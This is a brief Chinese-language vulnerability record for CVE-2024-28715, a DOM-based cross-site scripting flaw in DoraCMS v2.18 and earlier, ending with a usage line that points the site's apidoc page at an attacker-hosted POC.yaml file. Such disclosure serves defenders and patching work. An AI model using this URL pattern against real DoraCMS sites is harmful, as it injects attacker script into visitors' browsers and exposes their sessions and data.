[CVE 编号]
CVE-2024-28715
[产品]
DoraCMS
[版本]
DoraCMS v2.18 及更早版本
[问题类型]
基于DOM的XSS
[描述]
DOraCMS v.2.18 及更早版本中存在跨站脚本漏洞,允许远程攻击者通过 /app/public/apidoc/oas3/wrap-components/markdown.jsx 端点中的 markdown0 函数执行任意代码。
[使用方式]
https://[target-site]/static/apidoc/index.html?url=https://[your-site]/POC.yaml